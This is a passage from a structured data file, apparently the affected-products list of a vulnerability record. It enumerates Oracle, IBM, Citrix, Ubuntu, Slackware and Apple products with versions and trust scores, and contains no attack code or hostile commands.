}, { model: "sparc enterprise m3000 xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "1117", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.3", }, { model: "solaris cluster", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.3", }, { model: "solaris", scope: "eq", trust: 0.3, vendor: "oracle", version: "10", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.2.2", }, { model: "siebel applications ip2016", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications 
ip2015", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications ip2014", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5", }, { model: "siebel applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.1.1", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.71", }, { model: "secure global desktop", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.63", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail store inventory management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail service backbone", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, 
{ model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail returns management", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.2", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "retail order broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail integration bus", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail central office", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail central office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.4", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.3", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.2", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.0", }, { model: "retail back office", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.4", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.3", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.1", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.2", }, { model: "primavera p6 enterprise project portfolio management", scope: "eq", trust: 0.3, vendor: "oracle", version: "15.1", }, { model: "primavera contract management", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "portal", scope: "eq", trust: 0.3, vendor: 
"oracle", version: "11.1.16.0", }, { model: "policy automation for mobile devices", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation connector for siebel", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.6", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.5", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.3", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.2", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.4", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "10.3.1", }, { model: "policy automation", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.3", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.55", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.54", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.53", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2", }, { model: "peoplesoft enterprise fscm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.2", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.1", }, { model: "outside in technology", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.5.0", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.29", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.28", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.27", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.26", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.23", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.22", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.21", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.48", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.47", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.46", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", 
version: "5.5.45", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.42", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.41", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.40", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.25", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.24", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.20", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.16", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.15", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.44", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.43", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.36", }, { model: "mysql server", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.35", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.7.12", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.6.30", }, { model: "mysql", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.5.49", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8.1", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.8", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.7", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.6", }, { model: "micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.5", }, { model: 
"micros retail xbri loss prevention", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "jrockit r28.3.10", scope: null, trust: 0.3, vendor: "oracle", version: null, }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.30", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.24.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "jdeveloper", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "jd edwards enterpriseone tools", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.2.0.5", }, { model: "integrated lights out manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "integrated lights out manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1", }, { model: "integrated lights out manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance rules palette", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.6.1", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: 
"10.2.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.0", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "insurance policy administration j2ee", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.0.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.7.1", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.2.2", }, { model: "insurance calculation engine", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.2", }, { model: "in-memory policy analytics", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "hyperion financial reporting", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.4", }, { model: "http server 12c", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0", }, { model: "http server 11g", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0.1", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.0", }, { model: "healthcare master person index", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.12", }, { model: "healthcare analytics data integration", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.0.0.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1.0", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0.2.3", }, { model: "health sciences information manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.2.8.3", }, { model: "health sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2.0", }, { model: "health 
sciences clinical development center", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.1.0", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.1.2", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.0.1", }, { model: "glassfish server", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1.1", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.23.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.22.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.18.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.17.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3.0.0", }, { model: "fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.10", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.9", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.8", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.7", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.6", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.5", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.4", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.3", }, { model: "fusion applications", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2", }, { model: "fujitsu m10-4s server xcp", scope: "eq", 
trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4s server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-4 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2290", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2271", }, { model: "fujitsu m10-1 server xcp", scope: "eq", trust: 0.3, vendor: "oracle", version: "2230", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.1", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.3", }, { model: "flexcube direct banking", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.0.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.2", }, { model: "financial services lending and leasing", scope: "eq", trust: 0.3, vendor: "oracle", version: "14.1", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "exalogic infrastructure", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.0", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9", }, { model: "enterprise manager for fusion middleware", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "enterprise manager base platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "13.1.0.0", }, { model: "enterprise manager base platform", scope: "eq", trust: 
0.3, vendor: "oracle", version: "12.1.0.5", }, { model: "enterprise communications broker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.3", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.2", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.1", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.5", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.4", }, { model: "e-business suite", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1.3", }, { model: "documaker", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "directory server enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2", }, { model: "demand planning", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.1", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.12", }, { model: "database 12c release", scope: "eq", trust: 0.3, vendor: "oracle", version: "112.11", }, { model: "database 11g release", scope: "eq", trust: 0.3, vendor: "oracle", version: "211.2.0.4", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.5", }, { model: "communications unified session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications session border controller", 
scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3.0", }, { model: "communications session border controller", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.0", }, { model: "communications policy management", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.9", }, { model: "communications operations monitor", scope: "eq", trust: 0.3, vendor: "oracle", version: "0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1.0.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.2.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.0.1.0", }, { model: "communications network charging and control", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.4.1.5.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.530.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.529.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "8.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5.33.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0.5", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "communications messaging server", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.3", }, { model: "communications eagle application processor", scope: "eq", trust: 0.3, vendor: "oracle", version: "16.0", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: 
"7.3.5", }, { model: "communications core session manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2.5", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.3", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.2", }, { model: "communications asap", scope: "eq", trust: 0.3, vendor: "oracle", version: "7.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.2.1.0.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "business intelligence enterprise edition", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "12.2.1.0.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.9.0", }, { model: "bi publisher", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.5.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.1", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.4.0", }, { model: "banking platform", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.3.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.6", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: 
"3.2.1.00.10", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.3", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.1.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "5.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2.3.00.08", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "4.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2.0.00.27", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "3.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.2", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.1", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "2.0", }, { model: "application express", scope: "eq", trust: 0.3, vendor: "oracle", version: "1.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.5", }, { model: "agile plm", scope: "eq", trust: 0.3, vendor: "oracle", version: "9.3.4", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.2.0.0", }, { model: "agile engineering data management", scope: "eq", trust: 0.3, vendor: "oracle", version: "6.1.3.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.43", }, { model: "access manager", scope: "eq", trust: 0.3, 
vendor: "oracle", version: "10.1.4.2", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "10.1.4", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.2.0.0", }, { model: "access manager", scope: "eq", trust: 0.3, vendor: "oracle", version: "11.1.1.7.0", }, { model: "websphere application server", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.0", }, { model: "websphere application server liberty pr", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5.0-", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5.5", }, { model: "websphere application server liberty profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "websphere application server full profile", scope: "eq", trust: 0.3, vendor: "ibm", version: "8.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.8", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "9.7", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "11.1", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.5", }, { model: "db2", scope: "eq", trust: 0.3, vendor: "ibm", version: "10.1", }, { model: "netscaler t1", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler service delivery appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler gateway", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "netscaler application delivery controller", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "command center appliance", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "cloudbridge", scope: "eq", trust: 0.3, vendor: "citrix", version: "0", }, { model: "linux", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "14.10", }, { model: "linux lts", scope: "eq", trust: 0.3, vendor: "ubuntu", version: 
"14.04", }, { model: "linux lts i386", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "12.04", }, { model: "linux lts amd64", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "12.04", }, { model: "linux sparc", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "10.04", }, { model: "linux powerpc", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "10.04", }, { model: "linux i386", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "10.04", }, { model: "linux arm", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "10.04", }, { model: "linux amd64", scope: "eq", trust: 0.3, vendor: "ubuntu", version: "10.04", }, { model: "linux", scope: "eq", trust: 0.3, vendor: "slackware", version: "14.1", }, { model: "linux x86 64 -current", scope: null, trust: 0.3, vendor: "slackware", version: null, }, { model: "linux x86 64", scope: "eq", trust: 0.3, vendor: "slackware", version: "14.1", }, { model: "linux x86 64", scope: "eq", trust: 0.3, vendor: "slackware", version: "14.0", }, { model: "linux", scope: "eq", trust: 0.3, vendor: "slackware", version: "14.0", }, { model: "linux -current", scope: null, trust: 0.3, vendor: "slackware", version: null, }, { model: "linux", scope: "eq", trust: 0.3, vendor: "oracle", version: "7", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x4.1.5", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x3.2.2", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x3.2.1", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x3.1.2", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x4.1", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x4.0", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x3.2", }, { model: "mac os server", scope: "eq", trust: 0.3, vendor: "apple", version: "x3.0", }, { model: "mac os", scope: "eq", 
